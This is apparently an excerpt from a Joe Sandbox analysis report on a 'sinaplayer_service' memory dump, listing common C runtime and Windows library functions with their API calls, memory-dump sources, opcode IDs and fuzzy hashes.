                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ByteCharMultiWide$_errno_getptd_isleadbyte_l
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3831352077-0
                                                                                                                                                                                                    • Opcode ID: 1279a2b1953b942b18518c26257a542775d78795c4e8fb9658060248086e90b0
                                                                                                                                                                                                    • Instruction ID: 3af1aebb3a997fba3cdbebbeed00709fb647c802fdf1ed54a1db492f9005002f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1279a2b1953b942b18518c26257a542775d78795c4e8fb9658060248086e90b0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E831A031A0575AABFB118E76C844BBE7BF9BF45310F45812AE865CB091E731D890DB90
                                                                                                                                                                                                    Function 6D0A35D9 Relevance: 6.1, APIs: 4, Instructions: 99COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6D0AA6D5: DName::operator+.LIBCMT ref: 6D0AA74B
                                                                                                                                                                                                    • DName::operator+.LIBCMT ref: 6D0A3647
                                                                                                                                                                                                    • DName::operator+.LIBCMT ref: 6D0A364E
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Name::operator+
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2943138195-0
                                                                                                                                                                                                    • Opcode ID: c334d7cfd62cab175373601adfd5448784cfa1cd0d6100bd3848485ce6a3e285
                                                                                                                                                                                                    • Instruction ID: 1933db8062f7f749129935b7a6ee18a9537e5e8d0be56cae778232af55697722
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c334d7cfd62cab175373601adfd5448784cfa1cd0d6100bd3848485ce6a3e285
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5231A1716447059FDB00DFE8C851BAAB7F8AF59708B18846EE699C7382E7749840CB90
                                                                                                                                                                                                    Function 6D09F5D2 Relevance: 6.1, APIs: 4, Instructions: 94COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _towlower_l.MSVCR120(?,?,?), ref: 6D09F61A
                                                                                                                                                                                                      • Part of subcall function 6D091CD0: iswctype.MSVCR120(?,00000001,?,?,?,?,?), ref: 6D091D12
                                                                                                                                                                                                    • _towlower_l.MSVCR120(?,?,?,?,?), ref: 6D09F62A
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0DACCC
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D0DACD7
                                                                                                                                                                                                      • Part of subcall function 6D08F764: _getptd.MSVCR120(00000001,00000000,?,6D0AE01F,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6D08F77A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _towlower_l$_errno_getptd_invalid_parameter_noinfoiswctype
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1468503887-0
                                                                                                                                                                                                    • Opcode ID: 64deebebafb4b5d855bd85bef538c794e5a2feae737fe78107102acee94fd170
                                                                                                                                                                                                    • Instruction ID: 8b8880489ca676bc2f44f5a0703b5922dd07a772a9c3ec022b4adf03d105c801
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 64deebebafb4b5d855bd85bef538c794e5a2feae737fe78107102acee94fd170
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 08213576A0032B9BFB10DFA898807BB77E8BB00B11F950116F864AF191D7308D91E7A1
                                                                                                                                                                                                    Function 6D095857 Relevance: 6.1, APIs: 4, Instructions: 90COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _lock.MSVCR120(00000001,6D0958A0,00000010,6D09639E,6D0963D0,00000008), ref: 6D09586C
                                                                                                                                                                                                      • Part of subcall function 6D08EDD7: EnterCriticalSection.KERNEL32(?,?,6D11E497,0000000E,6D11E4F8,0000000C,6D08EC8C), ref: 6D08EDF3
                                                                                                                                                                                                    • _malloc_crt.MSVCR120(00000038,6D0958A0,00000010,6D09639E,6D0963D0,00000008), ref: 6D0D5A37
                                                                                                                                                                                                    • __crtInitializeCriticalSectionEx.MSVCR120(6D15DFE0,00000FA0,00000000,6D0958A0,00000010,6D09639E,6D0963D0,00000008), ref: 6D0D5A61
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6D15DFE0), ref: 6D0D5A75
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$Enter$Initialize__crt_lock_malloc_crt
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1908659308-0
                                                                                                                                                                                                    • Opcode ID: 1d0b0e01bac9c06e37d9e94106a1956b2a845bb63f4feafea87879825d537d83
                                                                                                                                                                                                    • Instruction ID: f26d7c6f7cc8bef0e4013e290053b5e69e4e47ae6d94a9e1634d9c84a7e9abff
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d0b0e01bac9c06e37d9e94106a1956b2a845bb63f4feafea87879825d537d83
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8131BE75908302DFE7108FAAD488B3A77F0FF09320B96516DE4759B291CB74E4809F41
                                                                                                                                                                                                    Function 6D0A3F7C Relevance: 6.1, APIs: 4, Instructions: 84COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6D0A3F83
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000,00000004,6D0A3C4A,?,00000001), ref: 6D0A4013
                                                                                                                                                                                                    • memset.MSVCR120(00000000,00000000,?,00000004,6D0A3C4A,?,00000001), ref: 6D0A402B
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000010), ref: 6D0A4044
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: H_prolog3memset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 747782440-0
                                                                                                                                                                                                    • Opcode ID: 6be67d86e6748749a95df6fb42cec2fa989c0dab7aacf28b80c65cb5e1b31a7b
                                                                                                                                                                                                    • Instruction ID: 80a3f5e0f7c551baa15f4bd3def8f5273e30c7e1c85617906685d4ded32772bf
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6be67d86e6748749a95df6fb42cec2fa989c0dab7aacf28b80c65cb5e1b31a7b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1931D0B0901B409FD724CF2A8541656FBF8BF98310B108A1FD2EACBAA0CBB0A505DF10
                                                                                                                                                                                                    Function 6D091D79 Relevance: 6.1, APIs: 4, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6D08F764: _getptd.MSVCR120(00000001,00000000,?,6D0AE01F,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6D08F77A
                                                                                                                                                                                                    • _towlower_l.MSVCR120(?,?), ref: 6D091DBB
                                                                                                                                                                                                      • Part of subcall function 6D091CD0: iswctype.MSVCR120(?,00000001,?,?,?,?,?), ref: 6D091D12
                                                                                                                                                                                                    • _towlower_l.MSVCR120(00000000,?,?,?), ref: 6D091DCE
                                                                                                                                                                                                    • _errno.MSVCR120(?), ref: 6D0DABFA
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?), ref: 6D0DAC05
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _towlower_l$_errno_getptd_invalid_parameter_noinfoiswctype
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1468503887-0
                                                                                                                                                                                                    • Opcode ID: 38a39bd1a0b66247343e370a84c995297be80ab28bcbabd15c118810698fdc25
                                                                                                                                                                                                    • Instruction ID: 53969786823035e1fb25fdea9a8db3ee8db26b00f70ecf26845f4918a4fa689e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 38a39bd1a0b66247343e370a84c995297be80ab28bcbabd15c118810698fdc25
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 30214B36F042625AFB24DED9D8407FA73E9EB11611FC6411AE9A04F1C5E7358D42E3A2
                                                                                                                                                                                                    Function 6D0B2EC8 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000001,00000000,00000001,00000002,?,00000000,?), ref: 6D0B2F3A
                                                                                                                                                                                                    • _get_osfhandle.MSVCR120(?,00000000), ref: 6D0B2F40
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 6D0B2F47
                                                                                                                                                                                                    • DuplicateHandle.KERNEL32(00000000), ref: 6D0B2F4A
                                                                                                                                                                                                      • Part of subcall function 6D094DF1: _get_osfhandle.MSVCR120(?,?,?,?,6D094F10,?,6D094F30,00000010), ref: 6D094DFA
                                                                                                                                                                                                      • Part of subcall function 6D094DF1: _get_osfhandle.MSVCR120(?), ref: 6D094E1D
                                                                                                                                                                                                      • Part of subcall function 6D094DF1: CloseHandle.KERNEL32(00000000), ref: 6D094E24
                                                                                                                                                                                                    • _errno.MSVCR120(?), ref: 6D0DF075
                                                                                                                                                                                                    • __doserrno.MSVCR120(?), ref: 6D0DF080
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _get_osfhandle$CurrentHandleProcess$CloseDuplicate__doserrno_errno
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4219055303-0
                                                                                                                                                                                                    • Opcode ID: af77ad93212bf51b6d194f7a6f2b10eb4c95aa19b83a760e90c0058ed4781c6d
                                                                                                                                                                                                    • Instruction ID: 65e1142035a793980d022e24922d5f1ec3ad1fedf187de9df7f0a440fc3f0f1f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: af77ad93212bf51b6d194f7a6f2b10eb4c95aa19b83a760e90c0058ed4781c6d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5F31F771908295BBEF119F28E9C4BA97FF5DF0A314F198199E9548F252C770D941CB40
                                                                                                                                                                                                    Function 6D0B2FD4 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000001,00000004,00000000,?,005C2D90,?,6D0B3036,005C2D90,00000000,?,005C2A20), ref: 6D0B2FF8
                                                                                                                                                                                                    • _wcsdup.MSVCR120(00000000,00000000,?,005C2D90,?,6D0B3036,005C2D90,00000000,?,005C2A20), ref: 6D0B3014
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _calloc_crt_wcsdup
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1800982338-0
                                                                                                                                                                                                    • Opcode ID: 6be68950c333f0118358c88a8cdf137a2006a4341983aba9b6d5a7b1c4908cee
                                                                                                                                                                                                    • Instruction ID: dcedd3e5e5544b03cdfbe96c6903803184d9e1169a2d1452585c021d0554e280
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6be68950c333f0118358c88a8cdf137a2006a4341983aba9b6d5a7b1c4908cee
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CC11D0B2B0C2179BFB208A6DED00B76B7E8DF457A5B25423EED58D7140EB72D8418790
                                                                                                                                                                                                    Function 6D0AE311 Relevance: 6.1, APIs: 4, Instructions: 70COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6D08F764: _getptd.MSVCR120(00000001,00000000,?,6D0AE01F,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6D08F77A
                                                                                                                                                                                                    • _tolower_l.MSVCR120(00000000,00000000,?,?,?,?), ref: 6D0AE370
                                                                                                                                                                                                    • _tolower_l.MSVCR120(00000000,00000000,00000000,00000000,?,?,?,?), ref: 6D0AE37F
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?), ref: 6D0B2AB7
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,?,?), ref: 6D0DAB87
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _tolower_l$_errno_getptd_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3234443108-0
                                                                                                                                                                                                    • Opcode ID: ed9bf525f1c48ced1e15b51d219a628de9eaefb9c13ec554bb3020071ed2572a
                                                                                                                                                                                                    • Instruction ID: c768777f3bd61c65eb67d08c6cc8f04771d4a47dbd7ed40bff780381711237ed
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ed9bf525f1c48ced1e15b51d219a628de9eaefb9c13ec554bb3020071ed2572a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36113D32A04256BFFB21CEB8DC48BFE77A4FB55254F150258E830971C2D7759840C7A1
                                                                                                                                                                                                    Function 6D0B3DB3 Relevance: 6.1, APIs: 4, Instructions: 68COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • QueryDepthSList.KERNEL32(000001F0,00000000,?,?,00000000,?,6D0F3F86,00000000,00000001), ref: 6D0B3DD2
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,00000000,?,6D0F3F86,00000000,00000001), ref: 6D0B3DF2
                                                                                                                                                                                                    • InterlockedPushEntrySList.KERNEL32(000001F0,?,?,00000000,?,6D0F3F86,00000000,00000001), ref: 6D0B3E0A
                                                                                                                                                                                                    • TlsSetValue.KERNEL32(?,?,6D15CFF4,00000000,00000000), ref: 6D0D30E3
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: List$CloseDepthEntryHandleInterlockedPushQueryValue
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 94243546-0
                                                                                                                                                                                                    • Opcode ID: 3a13e617c9f508fcf4ee62a81009cd14d25d7c832a1838dab903f704837977b4
                                                                                                                                                                                                    • Instruction ID: 95ffe8b98fef194abd51200968c3603cc7f054bc82f09fa77397da4b6f25f334
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3a13e617c9f508fcf4ee62a81009cd14d25d7c832a1838dab903f704837977b4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0721C3312082019FFB158F64D858B7B77FCFF4A350F10046AEA968B181CB71E805CBA1
                                                                                                                                                                                                    Function 6D0F5A72 Relevance: 6.1, APIs: 4, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6D0F5A79
                                                                                                                                                                                                    • Concurrency::details::SchedulerProxy::ToggleBorrowedState.LIBCMT ref: 6D0F5AC3
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 6D0F5AD3
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 6D0F5B2C
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$BorrowedConcurrency::details::EnterH_prolog3LeaveProxy::SchedulerStateToggle
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3260543872-0
                                                                                                                                                                                                    • Opcode ID: 0101cae68c1efe99898126763d236a47c12137fce75b43d80e00f2597425f137
                                                                                                                                                                                                    • Instruction ID: 0f09637bf91d62aeef6715b47634bc02bcd6ba5dd1beaa1973eec42c990b0332
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0101cae68c1efe99898126763d236a47c12137fce75b43d80e00f2597425f137
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 62212A746042469FEB05CF25C488BB97BF0BF45315F218189EC158F296C7B4E952CB91
                                                                                                                                                                                                    Function 6D0ADD80 Relevance: 6.1, APIs: 4, Instructions: 64COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _lock_file.MSVCR120(?,?,?,6D0ADE20,00000014), ref: 6D0ADDCC
                                                                                                                                                                                                      • Part of subcall function 6D094B96: _lock.MSVCR120(?), ref: 6D094BC1
                                                                                                                                                                                                    • _fgetwc_nolock.MSVCR120(?,?,?,6D0ADE20,00000014), ref: 6D0ADDE0
                                                                                                                                                                                                    • _errno.MSVCR120(6D0ADE20,00000014), ref: 6D0B175F
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(6D0ADE20,00000014), ref: 6D0D4F61
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_fgetwc_nolock_invalid_parameter_noinfo_lock_lock_file
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3916178533-0
